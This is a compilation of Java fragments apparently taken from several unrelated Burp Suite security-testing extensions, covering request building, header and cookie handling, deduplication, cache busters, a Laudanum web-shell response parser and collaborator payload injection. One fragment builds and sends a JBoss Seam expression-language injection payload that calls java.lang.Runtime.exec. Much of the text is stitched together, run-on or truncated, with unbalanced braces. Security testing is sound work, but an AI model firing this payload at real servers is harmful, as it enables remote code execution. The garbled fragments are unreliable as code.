/**
 * Returns the URL of the base request this object was created for.
 *
 * The URL is not cached: the stored base request/response is re-analyzed
 * through the Burp helpers on every call.
 *
 * @return the URL reported by the request analysis
 */
@Override
public URL getUrl() {
    return helpers
            .analyzeRequest(baseRequestResponse)
            .getUrl();
}
/**
 * Returns the header lines of the current message.
 *
 * @return a fresh empty list when no message is set; otherwise the list
 *         produced by analyzing the message as a request or as a
 *         response, depending on {@code isRequest}
 */
protected List<String> getHeaders() {
    // No message yet: hand back an empty list rather than null.
    if (message == null) {
        return new ArrayList<String>();
    }
    return isRequest
            ? helpers.analyzeRequest(message).getHeaders()
            : helpers.analyzeResponse(message).getHeaders();
}
/**
 * Builds a copy of the stored request in which this insertion point's
 * parameter carries the given payload.
 *
 * The payload bytes are converted to a string and passed through
 * {@code Utilities.encodeParam} before being placed in the parameter.
 *
 * @param payload raw payload bytes
 * @return the request returned by {@code updateParameter}
 */
@Override
public byte[] buildRequest(byte[] payload) {
    String payloadText = Utilities.helpers.bytesToString(payload);
    String encodedValue = Utilities.encodeParam(payloadText);
    IParameter replacement = Utilities.helpers.buildParameter(name, encodedValue, type);
    return Utilities.helpers.updateParameter(request, replacement);
}
/**
 * Builds a request that carries all of the given parameters at once.
 *
 * A parameter with a fixed placeholder name and an empty value is written
 * into the stored request, and the resulting {@code name=} text is then
 * swapped for the merged parameter string. Content-Length is fixed up
 * afterwards.
 *
 * @param params parameter names, merged by {@code prepBulkParams}
 * @return the rebuilt request
 */
public byte[] buildBulkRequest(ArrayList<String> params) {
    // NOTE(review): the merged string is inserted as-is; presumably
    // prepBulkParams already encodes names and values - confirm.
    String mergedParams = prepBulkParams(params);

    final String placeholderName = "TCZqBcS13SA8QRCpW";
    IParameter placeholder = Utilities.helpers.buildParameter(placeholderName, "", type);
    byte[] withPlaceholder = Utilities.helpers.updateParameter(request, placeholder);

    byte[] needle = Utilities.helpers.stringToBytes(placeholderName + "=");
    byte[] substitute = Utilities.helpers.stringToBytes(mergedParams);
    byte[] rebuilt = Utilities.replace(withPlaceholder, needle, substitute);
    return Utilities.fixContentLength(rebuilt);
}
/**
 * Builds a request by applying the given parameters to the stored request
 * one at a time.
 *
 * Each entry is resolved through {@code getValue}, which yields a
 * two-element array: element 0 is used as the parameter name and
 * element 1, after {@code Utilities.encodeParam}, as its value.
 *
 * @param params entries to resolve and apply, in order
 * @return the request after all updates; the stored request itself when
 *         {@code params} is empty
 */
byte[] buildBasicRequest(ArrayList<String> params) {
    byte[] current = request;
    for (String entry : params) {
        String[] nameAndValue = getValue(entry);
        String encodedValue = Utilities.encodeParam(nameAndValue[1]);
        IParameter updated = Utilities.helpers.buildParameter(nameAndValue[0], encodedValue, type);
        current = Utilities.helpers.updateParameter(current, updated);
    }
    return current;
}
}
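/**
 * Removes the named cookies from the stored request and drops the Cookie
 * header if nothing is left in it.
 *
 * @param cookieNames names of the cookies to remove
 */
void scrubCookies(Collection<String> cookieNames) {
    IExtensionHelpers helpers = BurpExtender.callbacks.getHelpers();
    for (String cookieName : cookieNames) {
        IParameter cookie = helpers.buildParameter(cookieName, "", IParameter.PARAM_COOKIE);
        request = helpers.removeParameter(request, cookie);
    }

    // If the Cookie: header is now empty, remove it.
    IRequestInfo requestInfo = helpers.analyzeRequest(request);
    List<String> headers = requestInfo.getHeaders();
    boolean removedEmptyCookieHeader = false;
    // Walk backwards so that removing an entry cannot make the loop skip
    // the element that slides into its place.
    for (int i = headers.size() - 1; i >= 0; i--) {
        // Exact match on "Cookie: " - presumably the form left behind
        // once the last cookie has been removed; verify against Burp.
        if (headers.get(i).equals("Cookie: ")) {
            headers.remove(i);
            removedEmptyCookieHeader = true;
        }
    }

    // Rebuild once, and only when a header line was actually dropped.
    if (removedEmptyCookieHeader) {
        byte[] body = Arrays.copyOfRange(request, requestInfo.getBodyOffset(), request.length);
        request = helpers.buildHttpMessage(headers, body);
    }
}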
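/**
 * Replaces the Authorization header of the given message with the value
 * configured in {@code authConfig}.
 *
 * Every existing header line that starts with "Authorization:" (in any
 * letter case) is dropped and one new Authorization header is appended.
 * The body is carried over unchanged.
 *
 * NOTE(review): the credential is attached to whatever message is passed
 * in. Nothing here checks the destination host, so the caller must make
 * sure only requests to the intended target reach this method, otherwise
 * the configured secret is sent to third parties. The configured value is
 * also concatenated into the header as-is; a value containing CR/LF would
 * add extra header lines - confirm it is validated where it is set.
 *
 * @param messageInfo the message to modify in place; may be null
 * @return always {@code true}
 */
public boolean doAuth(IHttpRequestResponse messageInfo) {
    if (messageInfo == null) {
        return true;
    }

    byte[] originalRequest = messageInfo.getRequest();
    IRequestInfo requestInfo = helpers.analyzeRequest(originalRequest);

    final String authPrefix = "Authorization:";
    List<String> newHeaders = new ArrayList<String>();
    for (String h : requestInfo.getHeaders()) {
        // regionMatches(ignoreCase) compares character by character and
        // does not depend on the default locale. toUpperCase() does: under
        // a Turkish locale "authorization" upper-cases with a dotted I, the
        // old header would survive and the request would carry two
        // Authorization headers.
        if (!h.regionMatches(true, 0, authPrefix, 0, authPrefix.length())) {
            newHeaders.add(h);
        }
    }
    newHeaders.add("Authorization: " + authConfig.getAuthPassword());

    // Copy the body bytes directly instead of round-tripping the whole
    // request through a String.
    int bodyOffset = requestInfo.getBodyOffset();
    byte[] body = originalRequest.length > bodyOffset
            ? java.util.Arrays.copyOfRange(originalRequest, bodyOffset, originalRequest.length)
            : new byte[0];

    messageInfo.setRequest(helpers.buildHttpMessage(newHeaders, body));
    return true;
}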
/**
 * Returns a copy of the request with {@code this.replace} appended as the
 * final header line.
 *
 * @param request raw request bytes
 * @return the message rebuilt from the adjusted headers and the original
 *         body bytes
 */
private byte[] addHeader(byte[] request) {
    IExtensionHelpers helpers = BurpExtender.getHelpers();
    IRequestInfo analyzedRequest = helpers.analyzeRequest(request);
    List<String> headerLines = analyzedRequest.getHeaders();

    // Drop a trailing Content-Length so that the appended header ends up
    // last. Only the final header line is inspected, case-sensitively.
    int lastIndex = headerLines.size() - 1;
    boolean endsWithContentLength = headerLines.get(lastIndex).startsWith("Content-Length:");
    if (endsWithContentLength) {
        headerLines.remove(lastIndex);
    }

    int bodyStart = analyzedRequest.getBodyOffset();
    byte[] body = Arrays.copyOfRange(request, bodyStart, request.length);
    headerLines.add(this.replace);
    return helpers.buildHttpMessage(headerLines, body);
}
IRequestInfo reqInfo = helpers.analyzeRequest(baseRequestResponse); URL curURL = reqInfo.getUrl(); byte[] rawRequest = baseRequestResponse.getRequest(); byte[] rawSimpleRequestSeam = helpers.addParameter(rawRequest, helpers.buildParameter("actionOutcome", "/pwd.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}", IParameter.PARAM_URL) ); IRequestInfo rawSimpleRequestSeamInfo = helpers.analyzeRequest(rawSimpleRequestSeam); List<String> headersSimpleRequestSeam = rawSimpleRequestSeamInfo.getHeaders(); byte messageSimple[] = helpers.buildHttpMessage(headersSimpleRequestSeam, Arrays.copyOfRange(rawSimpleRequestSeam, rawSimpleRequestSeamInfo.getBodyOffset(), rawSimpleRequestSeam.length)); IHttpRequestResponse respSimple = callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), messageSimple); byte[] rawRequestSeam = helpers.addParameter(rawRequest, helpers.buildParameter("actionOutcome", "/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" + i + "].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}}", IParameter.PARAM_URL) ); IRequestInfo rawRequestSeamInfo = helpers.analyzeRequest(rawRequestSeam); byte message[] = helpers.buildHttpMessage(headers, Arrays.copyOfRange(rawRequestSeam, rawRequestSeamInfo.getBodyOffset(), rawRequestSeam.length)); IResponseInfo responseInfo = helpers.analyzeResponse(httpResponse); if (header.substring(header.indexOf(":") + 1).trim().contains(helpers.bytesToString(GREP_STRING))) { issues.add(new CustomScanIssue( baseRequestResponse.getHttpService(), helpers.analyzeRequest(baseRequestResponse).getUrl(), resp,
/**
 * Appends a header line to the current message and rebuilds it.
 *
 * The message is analyzed as a request or as a response depending on
 * {@code isRequest}; the body bytes are kept unchanged.
 *
 * @param headerToAdd complete header line to append, used verbatim
 */
public void addHeader(String headerToAdd) {
    final List<String> headerLines;
    final int bodyStart;
    if (!isRequest) {
        IResponseInfo responseInfo = helpers.analyzeResponse(message);
        headerLines = responseInfo.getHeaders();
        bodyStart = responseInfo.getBodyOffset();
    } else {
        IRequestInfo requestInfo = helpers.analyzeRequest(message);
        headerLines = requestInfo.getHeaders();
        bodyStart = requestInfo.getBodyOffset();
    }

    headerLines.add(headerToAdd);
    byte[] body = Arrays.copyOfRange(message, bodyStart, message.length);
    this.message = helpers.buildHttpMessage(headerLines, body);
}
currentMessage = helpers.updateParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, samlContent.getType())); currentMessage = helpers.updateParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, samlContent.getType())); currentMessage = helpers.toggleRequestMethod(currentMessage); List<IParameter> parameters = helpers.analyzeRequest(currentMessage).getParameters(); for (IParameter param : parameters) { currentMessage = helpers.removeParameter(currentMessage, param); currentMessage = helpers.toggleRequestMethod(currentMessage); for (IParameter param : parameters) { if (samlContent.getValue().equals(param.getValue()) switch (samlContent.getType()) { case IParameter.PARAM_URL: currentMessage = helpers.addParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, IParameter.PARAM_BODY)); break; case IParameter.PARAM_BODY: currentMessage = helpers.addParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, IParameter.PARAM_URL)); break; currentMessage = helpers.addParameter(currentMessage,param);
String responseString = helpers.bytesToString(responseBytes); if (!responseString.contains(TOKEN)) { return; IResponseInfo responseInfo = helpers.analyzeResponse(responseBytes); String responseBody = helpers.bytesToString(Arrays.copyOfRange( responseBytes, responseInfo.getBodyOffset(), responseBytes.length)); byte[] newRequest = helpers.addParameter( messageInfo.getRequest(), helpers.buildParameter("token", token, IParameter.PARAM_BODY)); newRequest = helpers.toggleRequestMethod(newRequest); // Changes a request method GET to POST
/**
 * Decides whether this tab is shown for the given message.
 *
 * @param respBytes raw message bytes
 * @param isRequest {@code true} when the message is a request
 * @return {@code false} for requests; for responses, {@code true} when
 *         {@code BurpPolicyBuilder.getCspHeader} finds at least one CSP
 *         header
 */
@Override
public boolean isEnabled(byte[] respBytes, boolean isRequest) {
    // Requests never get this tab.
    if (isRequest) {
        return false;
    }
    // The tab appears only if the response has at least one CSP header.
    return !BurpPolicyBuilder.getCspHeader(helpers.analyzeResponse(respBytes)).isEmpty();
}
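/**
 * Reports whether a response body identical to this one has probably been
 * seen before, and records the body if it has not.
 *
 * The body is hashed with 32-bit Murmur3 and the hash string is looked up
 * in {@code dubBloomFilter}.
 *
 * NOTE(review): both steps are approximate. A 32-bit hash collides for
 * unrelated bodies, and {@code mightContain} can answer {@code true} for
 * a value that was never added. A {@code true} result therefore means
 * "probably a duplicate"; code that skips duplicates can silently skip a
 * response that was never inspected.
 *
 * @param messageInfo the message whose response is checked
 * @return {@code true} when the body hash is already in the filter;
 *         {@code false} when it is new, when there is no filter, no
 *         response, or no body
 */
public boolean isFullDuplicate(IHttpRequestResponse messageInfo) {
    // Without a filter there is nothing to compare against.
    if (dubBloomFilter == null) {
        return false;
    }

    byte[] response = messageInfo.getResponse();
    // A message that has no response yet cannot be a duplicate.
    if (response == null) {
        return false;
    }

    int bodyOffset = helpers.analyzeResponse(response).getBodyOffset();
    if (response.length <= bodyOffset) {
        return false;
    }

    /* full-dub detection */
    byte[] body = java.util.Arrays.copyOfRange(response, bodyOffset, response.length);
    String dedupHashValue = Hashing.murmur3_32().hashBytes(body).toString();
    if (dubBloomFilter.mightContain(dedupHashValue)) {
        return true;
    }
    dubBloomFilter.put(dedupHashValue);
    return false;
}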
/**
 * Prepares a request for sending: fills in the random placeholder and,
 * depending on the settings, adds a cache-busting URL parameter.
 *
 * Every occurrence of the literal {@code $randomplz} is replaced with one
 * generated canary and Content-Length is fixed up. A URL parameter with
 * value "1" is then added: named after a fresh canary when
 * "Add dynamic cachebuster" is enabled, else named "fcbz" when
 * "Add 'fcbz' cachebuster" is enabled, else not at all.
 *
 * @param messageInfo message whose request is rewritten in place
 */
private void addCacheBusters(IHttpRequestResponse messageInfo) {
    byte[] marker = Utilities.helpers.stringToBytes("$randomplz");
    boolean hasMarker = Utilities.countMatches(messageInfo.getRequest(), marker) > 0;
    if (hasMarker) {
        byte[] current = messageInfo.getRequest();
        byte[] canary = Utilities.helpers.stringToBytes(Utilities.generateCanary());
        byte[] substituted = Utilities.replace(current, marker, canary);
        messageInfo.setRequest(Utilities.fixContentLength(substituted));
    }

    // The dynamic setting takes precedence over the fixed 'fcbz' name.
    final String busterName;
    if (Utilities.globalSettings.getBoolean("Add dynamic cachebuster")) {
        busterName = Utilities.generateCanary();
    } else if (Utilities.globalSettings.getBoolean("Add 'fcbz' cachebuster")) {
        busterName = "fcbz";
    } else {
        return;
    }

    IParameter buster = burp.Utilities.helpers.buildParameter(busterName, "1", IParameter.PARAM_URL);
    byte[] withBuster = Utilities.helpers.addParameter(messageInfo.getRequest(), buster);
    messageInfo.setRequest(withBuster);
}
/**
 * Parses a response body of the form {@code name=value&name=value} into
 * {@code params}.
 *
 * Only pieces that split on '=' into exactly two parts are stored; the
 * name is trimmed and the value URL-decoded. When fewer than two entries
 * end up in {@code params}, the whole URL-decoded body is stored under
 * "stderr" so the caller still sees what came back.
 *
 * NOTE(review): every stored value comes straight from the remote
 * response; code that displays or acts on {@code params} should treat the
 * contents as untrusted.
 *
 * @param callbacks     Burp callbacks, used for the helper functions
 * @param responseBytes raw response, headers included
 */
public LaudanumResponse(IBurpExtenderCallbacks callbacks, byte[] responseBytes) {
    int bodyStart = callbacks.getHelpers().analyzeResponse(responseBytes).getBodyOffset();
    byte[] body = Arrays.copyOfRange(responseBytes, bodyStart, responseBytes.length);
    String bodyText = callbacks.getHelpers().bytesToString(body);

    for (String pair : bodyText.split("&")) {
        String[] nameAndValue = pair.split("=");
        if (nameAndValue.length != 2) {
            continue;
        }
        params.put(nameAndValue[0].trim(), callbacks.getHelpers().urlDecode(nameAndValue[1]));
    }

    // If the response could not be processed, hand back what was received.
    if (params.size() < 2) {
        params.put("stderr", callbacks.getHelpers().urlDecode(bodyText));
    }
}
) { List<String> headers = buildHeaders(swagger, path, operation); byte[] httpMessage = this.burpExtensionHelpers.buildHttpMessage(headers, null); case "body": httpMessage = this.burpExtensionHelpers .addParameter(httpMessage, this.burpExtensionHelpers .buildParameter(parameter.getName(), type, (byte) 1)); case "query": httpMessage = this.burpExtensionHelpers .addParameter(httpMessage, this.burpExtensionHelpers .buildParameter(parameter.getName(), type, (byte) 0));
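/**
 * Returns a copy of the request in which the value of the named header is
 * replaced.
 *
 * The result is the request up to {@code offsets[1]}, then the new value,
 * then the request from {@code offsets[2]} onwards, where {@code offsets}
 * comes from {@code getHeaderOffsets}.
 *
 * @param request raw request bytes
 * @param header  name of the header to change
 * @param value   new header value
 * @return the rewritten request
 * @throws RuntimeException if the header cannot be located
 */
public static byte[] setHeader(byte[] request, String header, String value) {
    int[] offsets = getHeaderOffsets(request, header);

    // Check for the missing header explicitly instead of catching the
    // NullPointerException it would cause further down. Presumably
    // getHeaderOffsets returns null when the header is absent - confirm.
    if (offsets == null) {
        Utilities.out("header locating fail: "+header);
        // NOTE(review): this writes the complete raw request, including
        // any cookies or credentials in it, to the extension output.
        Utilities.out("'"+helpers.bytesToString(request)+"'");
        throw new RuntimeException("Can't find the header");
    }

    byte[] valueBytes = helpers.stringToBytes(value);
    ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
    // write(byte[], int, int) on a ByteArrayOutputStream declares no
    // IOException and avoids copying each slice first.
    outputStream.write(request, 0, offsets[1]);
    outputStream.write(valueBytes, 0, valueBytes.length);
    outputStream.write(request, offsets[2], request.length - offsets[2]);
    return outputStream.toByteArray();
}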
/**
 * Applies every configured injection point to the request.
 *
 * A "Cache-Control: no-transform" header is set first. Each entry of
 * {@code injectionPoints} is read as {type, name, template}: in the
 * template, {@code %s} is replaced with an id from
 * {@code collab.generateCollabId} and {@code %h} with the request's
 * current Host header value. Type "param" replaces the URL parameter of
 * that name, type "header" adds or replaces the header of that name, and
 * any other type is logged and skipped.
 *
 * @param request     raw request bytes
 * @param requestCode passed through to {@code collab.generateCollabId}
 * @return the request with all injections applied
 */
public byte[] injectPayloads(byte[] request, Integer requestCode) {
    request = Utilities.addOrReplaceHeader(request, "Cache-Control", "no-transform");

    for (String[] point : injectionPoints) {
        String withCollabId = point[2].replace("%s", collab.generateCollabId(requestCode, point[1]));
        // %h is resolved against the request as it stands now, so a Host
        // header changed by an earlier entry is the one that gets used.
        String payload = withCollabId.replace("%h", Utilities.getHeader(request, "Host"));

        switch (point[0]) {
            case "param": {
                // Remove first so the parameter is replaced, not duplicated.
                IParameter injected = Utilities.helpers.buildParameter(point[1], payload, IParameter.PARAM_URL);
                request = Utilities.helpers.removeParameter(request, injected);
                request = Utilities.helpers.addParameter(request, injected);
                break;
            }
            case "header": {
                request = Utilities.addOrReplaceHeader(request, point[1], payload);
                break;
            }
            default: {
                Utilities.out("Unrecognised injection type: " + point[0]);
            }
        }
    }

    return request;
}
/**
 * Adds a parameter to the stored request bytes.
 *
 * @param name  parameter name
 * @param value parameter value, passed to the helper as given
 * @param type  parameter type, passed through to {@code buildParameter}
 */
private void addParameter(String name, String value, byte type) {
    IParameter added = callbacks.getHelpers().buildParameter(name, value, type);
    byte[] updated = callbacks.getHelpers().addParameter(requestBytes, added);
    requestBytes = updated;
}